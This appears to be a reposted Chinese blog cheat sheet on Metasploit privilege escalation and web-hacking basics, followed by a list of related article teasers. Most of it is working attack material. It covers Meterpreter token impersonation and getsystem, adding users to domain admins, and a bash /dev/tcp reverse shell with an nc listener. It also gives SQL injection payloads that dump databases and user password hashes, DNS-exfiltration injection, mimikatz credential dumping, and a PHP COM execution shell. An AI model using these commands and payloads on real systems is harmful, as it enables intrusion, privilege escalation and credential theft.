msf提权基础(一)

令牌(token)相当于系统的临时密钥(账号及密码)

加载incognito模块

meterpreter> use incognito

meterpreter > list_tokens -u //列出可用令牌

meterpreter > impersonate_token WIN-xxxxxxxxx\\Administrator //模拟令牌

[+] Successfully impersonated user WIN-xxxxxx\Administrator //成功模拟成administrator用户

meterpreter > getsystem //自动尝试提权

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid //当前会话用户身份

Server username: NT AUTHORITY\SYSTEM

delegation授权令牌

impersonation 模拟令牌

需要两个反斜杠

impersonate_token win7-pc\\administrator

添加域用户

net user ihoney ihoney1 /add /domain

添加到管理员组

net group “domain admins” ihoney /add /domain

查看域管理组

net group “domain admins” /domain

上传exe

upload /root/ma.exe c:\

肉鸡：

[root@xxx hashcrack]# bash -i >& /dev/tcp/yyy/9999 0>&1

黑客机先监听：

[root@yyy ~]# nc -vv -l -p 9999

报错注入

and 1=(updatexml(1,concat(0x3a,(user())),1))#

whois信息收集

直接输入whois 目标网址（不用加www）

或者输入whois 目标IP地址

高级扫描方式:(扫描网段开了某端口的主机)

use auxiliary/scanner/ip/ipidseq

show options

set RHOSTS 目标IP网段比如2.0/24

set THREADS 50

run

扫描某主机端口

use auxiliary/scanner/portscan/syn

show options

set RHOST 目标IP

set THREADS 50

run

扫描开了smb服务的主机

use auxiliary/scanner/smb/smb_version

show options

set RHOSTS 目标网段/24

set THREADS 50

run

找mssql 主机

use auxiliary/scanner/mssql/mssql_ping

show options

set RHOSTS 扫描网段/24

set THREADS 50

run

SSH服务器扫描

use auxiliary/scanner/ssh/ssh_version

show options

set RHOSTS 扫描网段/24

set THREADS 50

run

Telnet服务器扫描

use auxiliary/scanner/telnet/telnet_version

show options

set RHOSTS 扫描网段/24

set THREADS 50

run

FTP主机扫描

use auxiliary/scanner/ftp/ftp_version

show options

set RHOSTS 扫描网段/24

set THREADS 50

run

扫描FTP匿名登陆

use auxiliary/scanner/ftp/ftp_anonymous

show options

set RHOSTS 扫描网段/24

set THREADS 50

run

扫描局域网内有哪些主机存活

use auxiliary/scanner/discovery/arp_sweep

set RHOSTS 扫描网段/24

set THREADS 50

run

扫描网站目录

use auxiliary/scanner/http/dir_scanner

set RHOST 目标IP

set THREADS 50

run

扫描SNMP主机:

use auxiliary/scanner/snmp/snmp_login

set RHOSTS 扫描网段/24

set THREADS 50

run 搜索目标网站中的E-mail地址

use auxiliary/gather/search_email_collector

set DOMAIN 目标网站（不加www）

run

嗅探抓包(ftp)

use auxiliary/sniffer/psnuffle

run

httpsdnslog平台

https://exeye.io/register

sql盲注执行：

union select 1,load_file(concat(0x5c5c5c5c,version(),0x78782E74657374312E69686F6E65797365632E746F702F696969));

数据库执行时会访问dnslog域名：

xx.test1.ihoneysec.top/iii

[更新]Mysql身份认证漏洞及利用(CVE-2012-2122)www.freebuf.com/vuls/3815.html

常用提权命令：

whoami

net user

net view

net start 启动的服务

systeminfo

hostname

ipconfig /all

tasklist /svc 寻找Termservice找到PID

netstat -ano 找到监听端口

arp -a

route print

netsh firewall show state

netsh firewall show config

dir

type

copy

http://www.5kik.com/phpnews/3.html （php利用wsh以及Shell.Application执行命令）

https://blog.csdn.net/jaray/article/details/49093317（运行Php提示COM未找到）

https://www.cnblogs.com/phpk/p/6097353.html （ini_set("display_errors","On");和error_reporting(E_ALL);）

前提：

需要知道网站路径，上传wucanshu.exe(F4ck的api加用户工具)

访问http://ip/wsh.php

<?php

ini_set("display_error", "On");

error_reporting(E_ALL);

echo 1;

$wsh = new COM("shell.Application") or dir("Failed!");

$exec = $wsh->open("C:\\www\\wucantishi.exe");

echo $exec;

echo 21;

运行即API添加用户：

UserName:F4ck

PassWord:F4ckTeam!@#

菜刀下载大文件可能会失败，改后缀为rar用浏览器下载

IIS 8.0默认404禁止下载mdb后缀文件

两条命令读取明文密码：

privilege::debug

sekurlsa::logonpasswords

msf加载mimikatz读明文：

meterpreter > use mimikatz

meterpreter > wdigest

F4ck带参数添加用户：

7.exe ceshi 12345678 administrator /add

会克隆一个管理员用户

抓取sqlmap的爆所有数据库名语句：

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT NULL,NULL,CONCAT(0x716a626a71,IFNULL(CAST(schema_name AS CHAR),0x20),0x7171786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA%23

手工测试读取数据库名：

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(schema_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.SCHEMATA%23

表名：

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(table_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.tables where table_schema=0x736561%23

列名：

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(column_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.columns where table_schema=0x736561 and table_name='nh_user'%23

读账密：

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(id,'%2c',username,'%2c',password),4,5,6,7,8,9,10,11,12 FROM sea.nh_user%23

[0001]《1,xiaodi,c44af6fc4c97a6b1e93885cc4ae399f2》

转载于:https://www.cnblogs.com/i-honey/p/8825034.html

msf提权基础(一)相关推荐

漏洞利用与提权（一）：提权基础
1. 提权概述 1.1 概述提权顾名思义就是提高自己在系统中的权利.渗透测试以获取系统的最高权限为目标,首先通过寻找漏洞,获取WebShell权限,然后进行提权. 提权可分为: 操作系统提权 Win ...
Windows提权基础：信息收集技巧及可用漏洞搜索
本文收集整理一些跟提权紧密相关的信息收集技巧和方法,以及如何在kali中搜索可用的漏洞,最后整理了目前可供使用的一些漏洞对应msf下的模块以及操作系统可提权的版本. 0X00 Windows提权信息收 ...
118.网络安全渗透测试—[权限提升篇16]—[Windows MSF提权模块提权审计工具]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录一.MSF 结合漏洞审计工具进行提权 1.MSF漏洞审计模块:local_exploit_suggeste 2. ...
Day1——提权学习之提权基础
0x00 提权技术分类大概分为三种: 1.系统溢出漏洞提权 2.数据库提权 3.第三方软件提权 0x01 通常脚本所处的权限 1.asp / php 匿名权限(网络服务权限) 2.aspx user ...
使用MSF进行提权（windows提权、linux提权、wesng使用）
文章目录 MSF Windows提权反弹shell 提权 END推荐阅读 MSF Linux提权反弹shell 补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位 ...
MySQL提权总结与记录-UDF/MOF/启动项提权
0x00 Mysql提权基础 Mysql提权主要是需要利用高权限的Mysql用户进行操作,拿用户主要是下列几种方式注入上传getshell 查看网站数据库配置信息拿到用户密码弱口令 mysql系 ...
web安全：mysql提权总结篇
前言前两天参加了省赛的内网渗透,在拿到webshell后发现是一个站库分离,通过信息搜集得到了数据库的账号密码,但是是一个www-data权限,执行不了代理的命令,这时候就需要提权到root权限才能 ...
一文了解提权：溢出提权和第三方组件提权
前言对提权做个归纳提权一般分为两种: 溢出提权第三方组件提权一.溢出提权溢出提权就是利用系统漏洞进行提权远程溢出:攻击者只要与服务器连接,然后根据漏洞使用响应的exp即可,如著名的MS-0 ...
mysql反弹提权_MySQL数据库反弹端口连接提权
[51CTO.com原创稿件]在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令.在一般的情况下,也就放弃了.但其实可以 ...

msf提权基础(一)

msf提权基础(一)相关推荐

最新文章

热门文章